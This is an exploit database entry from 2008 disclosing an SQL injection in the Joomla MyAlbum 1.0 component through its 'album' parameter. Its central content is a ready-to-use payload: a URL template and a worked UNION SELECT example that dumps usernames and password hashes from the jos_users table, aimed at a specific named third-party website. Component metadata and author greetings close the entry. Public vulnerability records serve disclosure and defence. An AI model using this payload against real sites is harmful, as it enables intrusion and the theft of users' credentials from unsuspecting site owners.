Joomla! Component MyAlbum 1.0 - 'album' SQL Injection

EDB-ID:

5318


Author:

parad0x

Type:

webapps


Platform:

PHP

Date:

2008-03-28


-------------------------------------------------------------------------------------------------
# Title   :  Joomla Component MyAlbum SQL Injection Vulnerability
# Author  :  parad0x
# D.Page  :  http://joomlacode.org/gf/project/myalbum/
-------------------------------------------------------------------------------------------------
http://[target]/index.php?option=com_myalbum&album=[SQL]

-------------------------------------------------------------------------------------------------
Example:

http://www.akparti.org.tr/disiliskiler/index.php?option=com_myalbum&album=-1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*

-------------------------------------------------------------------------------------------------
greetz : VoLqaN
-------------------------------------------------------------------------------------------------
http://inso.host.sk

side note:
  <name>myalbum</name>
  <creationDate>01.06.2007</creationDate>
  <author>Hüseyin Bora ABACI</author>
  <copyright>GNU/GPL</copyright>
  <authorEmail>borkurt@hotmail.com</authorEmail>

  <authorUrl>www.joomla.org</authorUrl>
  <version>1.0</version>
  <description>MyAlbum is practical,comfortable,fast simple a picture gallery component.</description>

# milw0rm.com [2008-03-28]